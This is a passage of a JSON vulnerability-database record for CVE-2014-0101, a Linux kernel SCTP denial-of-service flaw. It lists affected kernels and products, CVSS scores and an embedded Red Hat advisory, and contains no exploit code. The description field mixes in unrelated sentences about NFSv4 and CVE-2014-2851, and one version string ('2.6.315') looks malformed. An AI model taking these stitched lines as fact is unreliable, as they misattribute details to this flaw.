        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel 2.6.36-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel 2.6.35-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel 2.6.35-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel 2.6.28-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "hat enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "hat enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.56",
                "versionStartIncluding": "2.6.24",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.4.84",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.10.34",
                "versionStartIncluding": "3.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.12.15",
                "versionStartIncluding": "3.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.13.7",
                "versionStartIncluding": "3.13",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:4.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_adc:4.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_security:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_device:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_cloud:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_protocol_security_module:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.4.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.4.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_enterprise_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.3.0",
                "versionStartIncluding": "2.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_enterprise_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.1.1",
                "versionStartIncluding": "3.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.3",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2014-0101",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2014-0101",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-67594",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-0101",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0101",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201403-197",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67594",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-0101",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The sctp_sf_do_5_1D_ce function in net/sctp/sm_statefuns.c in the Linux kernel through 3.13.6 does not validate certain auth_enable and auth_capable fields before making an sctp_sf_authenticate call, which allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via an SCTP handshake with a modified INIT chunk and a crafted AUTH chunk before a COOKIE_ECHO chunk. The Linux kernel is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected computer, denying service to legitimate users. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability stems from the fact that the program does not verify the auth_enable and auth_capable fields before calling sctp_sf_authenticate. \n(CVE-2014-2851)\n\nSasha Levin reported a bug in the Linux kernel\u0027s virtual memory management\nsubsystem. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2014:0419-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0419.html\nIssue date:        2014-04-22\nCVE Names:         CVE-2014-0101 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 6.3 Extended Update Support. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from the\nCVE link in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Compute Node EUS (v. 6.3) - noarch, x86_64\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.3) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.3) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.3) - i386, ppc64, s390x, x86_64\n\n3. \n\n* A flaw was found in the way the Linux kernel processed an authenticated\nCOOKIE_ECHO chunk during the initialization of an SCTP connection. (CVE-2014-0101, Important)\n\nRed Hat would like to thank Nokia Siemens Networks for reporting this\nissue. \n\nThis update also fixes the following bug:\n\n* Due to an incorrect call of the weak-modules script in the kernel spec\nfile, the weak-modules directory was removed from the system when removing\nor upgrading certain kernel packages related to weak-modules, such as\nkernel-debug. With this update, the weak-modules call in the kernel spec\nfile has been corrected, and the script now preserves the weak-modules\ndirectory on the system in this scenario. (BZ#1076599)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not use\n\"rpm -Uvh\" as that will remove the running kernel binaries from your\nsystem. You may use \"rpm -e\" to remove old kernels after determining that\nthe new kernel functions properly on your system. \n\n5. Package List:\n\nRed Hat Enterprise Linux Compute Node EUS (v. 6.3):\n\nSource:\nkernel-2.6.32-279.43.1.el6.src.rpm\n\nnoarch:\nkernel-doc-2.6.32-279.43.1.el6.noarch.rpm\nkernel-firmware-2.6.32-279.43.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-devel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-headers-2.6.32-279.43.1.el6.x86_64.rpm\nperf-2.6.32-279.43.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.3):\n\nSource:\nkernel-2.6.32-279.43.1.el6.src.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.3):\n\nSource:\nkernel-2.6.32-279.43.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-279.43.1.el6.i686.rpm\nkernel-debug-2.6.32-279.43.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-279.43.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-279.43.1.el6.i686.rpm\nkernel-devel-2.6.32-279.43.1.el6.i686.rpm\nkernel-headers-2.6.32-279.43.1.el6.i686.rpm\nperf-2.6.32-279.43.1.el6.i686.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-279.43.1.el6.noarch.rpm\nkernel-firmware-2.6.32-279.43.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debug-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-devel-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-headers-2.6.32-279.43.1.el6.ppc64.rpm\nperf-2.6.32-279.43.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debug-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-279.43.1.el6.s390x.rpm\nkernel-devel-2.6.32-279.43.1.el6.s390x.rpm\nkernel-headers-2.6.32-279.43.1.el6.s390x.rpm\nkernel-kdump-2.